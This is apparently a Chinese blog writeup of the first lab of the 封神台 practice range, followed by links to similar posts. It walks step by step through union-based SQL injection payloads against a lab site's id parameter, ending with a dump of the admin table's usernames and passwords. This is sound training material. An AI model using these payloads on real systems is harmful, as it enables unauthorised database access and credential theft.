封神台靶场 第一章:为了女神小芳!writeup

最新推荐文章于 2025-10-24 11:16:09 发布
原创 最新推荐文章于 2025-10-24 11:16:09 发布 · 2.9w 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文详细记录了一次SQL注入攻击的过程,通过封神台靶场的第一章来展示。首先找到注入点,然后确定字段数、回显位置,接着暴露数据库名、表名和字段名,并最终获取字段值。通过一系列SQL语句,成功完成联合注入,获取到所需信息。此题帮助作者复习并巩固了联合注入的知识。

封神台靶场 第一章:为了女神小芳!

目录

封神台靶场 第一章:为了女神小芳!

题目简述:

解题过程:

寻找注入点

查看字段数

查看回显位置

查看版本信息

爆数据库名

爆表名

爆字段名

获取字段值

总结

题目简述:

封神台靶场,题目链接

解题过程:

首先是这样的url为:

http://59.63.200.79:8003/

当点击点击查看新闻时,相应的url变化,变为如下:

http://59.63.200.79:8003/?id=1

寻找注入点

?id=1 and 1=1#   回显正常

?id=1 and 1=2#  回显异常

查看字段数

?id=1 order by 1,2#  回显正常

?id=1 order by 3#  回显异常

判断字段数为2

查看回显位置

得到回显位置为2

?id=20 union select 1,2#

查看版本信息

?id=20 union select 1,version()#

爆数据库名

?id=20 union select 1,database()#

爆表名

?id=20 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

爆字段名

猜测所要的信息在admin表中

?id=20 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#

获取字段值

?id=20 union select 1,group_concat(username,0x3a,password) from admin#

最后将hellohack作为flag提交即可。

总结

这个题目比较常规,算是又复习了一遍联合注入的知识,加深了印象。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

封神台在线靶场——第一章:为了女神小芳!
pigzlfa的博客
10-10 871
sql注入基础版。
封神台靶场 | 显错注入 | Pass01-04
Fanny0602的博客
03-05 1080
封神台靶场 | 显错注入 题目地址: 掌控安全学院SQL注入靶场 显错注入 Pass01 Pass02 Pass03 Pass04 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass01 数据库查询语句: select *from user where id=1 Pass02 数据库查询语句: select *from user where id=‘1’ Pass03 数据库查询语句: select *from user where id=(‘1’) Pass04 数据库查询语
学会技术去哪练习?15大必备靶场推荐
最新发布
bdfcfff77fa的博客
10-24 1014
是一个聚焦于网络安全领域的在线模拟攻防实训平台。它由资深红队专家团队开发,。平台上的靶机环境,均源自多年真实攻防场景的提炼,致力于助力学员快速掌握网络安全实战技能。
封神台(尤里的复仇),信息收集1--靶场练习,纯手工注入
久恙502的博客
10-10 965
尤里的复仇,做过一遍重新复现一次,练习渗透测试
第一章:为了女神小芳
m0_59205095的博客
05-16 2441
第一章:为了女神小芳 通过sql注入拿到管理员密码!尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站 学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了 宠物猫 异国短毛猫 纯种猫 加菲猫 波斯猫 辛巴猫舍 纯种双色/梵文波斯、异国小猫 CFA注册猫舍 (aqlab.cn) 实验工具 sqlmap 实验环境 kali 1.判断是否存在注入点,页面显示如图所示可能存在sql注入点 http://rhiq8003.ia.aqlab.cn/?id=1and%
封神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】
红凳子的博客
05-07 2666
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 封神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
封神台 sql 注入靶场 writeup
白帽渗透笔记的博客
07-21 988
今天给大家带来封神台 sql 注入靶场前 4 关的解题思路,并不算难。 地址 https://hack.zkaq.cn/battle#bid=cd23d4b58f0dfd3e 0x01 首先判断是否存在注入点,修改地址,尝试 id=1 and 1=1 可以正常显示数据,id=1 and 1=2 无法显示数据,故存在注入。 继续猜解字段数,id=1 order by 1 可以正常显示数据,一直到 4 才无法显示,故字段数为 3,使用 id=1 and 1=2 union select 1,
精选资源
2020YCBCTF:2020羊城杯官方writeup
03-24
2020年 2020羊城杯官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
精选资源
---vulhub_Writeup:vulhub靶场个人writeup,转载引用请注明地址,坑点补充联系作者。
03-03
vulhub_Writeup 主要写一些个人在打vulhub靶场中自己遇到的问题和处理方法。作为分享与个人查询所用。 笔者从2020年11月开始自学网安,水平有限,如有问题,恳请指正。 电子邮件:
Hackthis!! Writeup——Crypt Level
qq_43148462的博客
03-05 577
Level 1: 这道题。。。反过来看一下就OK了。。。略了 Level 2: Aipgsqi fego, xlmw pizip mw rsx ew iewc ew xli pewx fyx wxmpp rsx xss gleppirkmrk. Ws ks elieh erh irxiv xlmw teww: wlmjxxlexpixxiv 这道题是一道凯撒密码的题,上网随便搜一个或者自己写一...
第二届网鼎杯(第一场:青龙组)web WriteUp
a3320315的博客
05-11 2616
学校战队总排名52,web和pwn各拿了一个一血,只能说师傅太强了,不过后来的排名有点起飞,最后半小时,直接从前十名飞出去了~~ filejava 这道题主要考察的是java的xxe漏洞,这个题目总共有两个功能,上传和下载功能,有上传和下载,我们就想到两个漏洞点,是否有任意文件上传或者任意文件下载? 经过测试确实有任意文件下载,但是任意文件上传确不存在,但是却能够为我们提供路径~~ 任意文件下载 但是我们不知道web的路径怎么办?我们还有文件上传的报错~~ 文件上传 我们可以看到报错处直接给了web的
封神台-靶场-第一章:为了女神小芳!(题解)+ 中北网安实训笔记-(20200701)-sql注入基本语法
tonyhapply的博客
07-18 1725
我们先来学习sql注入,
封神台——尤里的复仇Ⅰ 小芳
ASD830的博客
03-21 734
我们可以查出“admin“”表里 有 “id” “username” “password” 三个字段。题目说让我们拿到管理员账户的密码,我们看一下username和password字段的内容。尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站。根据提示我们需要浅浅的sql注入一下,首先判断一下是否存在SQL注入漏洞。学过一点黑客技术的他,想在女神面前炫炫技。页面不正常,说明存在SQL注入漏洞。页面出现了2,说明我们的回显位为2。页面不正常,判断出字段数为2。
mbp 封神台靶场 一(笔记)
热门推荐
qq_43558415的博客
02-09 1万+
最近在看掌控安全的公开课,里面提到了封神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。 一、寻找注入点 看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网页出现了错误。 二、判断字段数 在发现这可以进行SQL注入后便要判断它的字段数,用...
封神台靶场 第一章:为了女神小芳 (SQL注入)
m0_65712192的博客
10-14 2631
封神台靶场 第一章:为了女神小芳 (SQL注入)
封神台靶场
m0_71518346的博客
10-18 1163
尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。使用ModHeader插件,SQL语句的空格用加号代替。用from猜测有没有admin表 union select 1,2,3,4,5,6,7,8,9,10 from admin 被拦截。username和password字段的值:admin、b9a2a2b5dffb918c。直接尝试注入判断字段数order by 10。默认管理员后台是根目录的/admin/发现页面回显了2、3、7、8、9。
封神台靶场---尤里的复仇Ⅰ小芳!---第二章遇到阻难!绕过WAF过滤!
qq_44336568的博客
06-28 3397
封神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!渗透学习、靶场练习
封神台靶场练习
token_x的博客
08-05 671
封神台靶场练习,未完待补充
封神台靶场 | 布尔盲注 | Pass05-07
Fanny0602的博客
03-12 1806
封神台靶场 | 布尔盲注 题目地址: 掌控安全学院SQL注入靶场 文章目录       Pass05          盲注          盲注查询步骤       Pass06       Pass07 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass05 数据库查询语句: select * from news where id=1 盲注: 1.查询到的数据只会显示有数据/没有结果 2.可以用ASCII进行猜测 盲注查询步骤: 1.数据库名字长度 2.数据库库名 3.
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值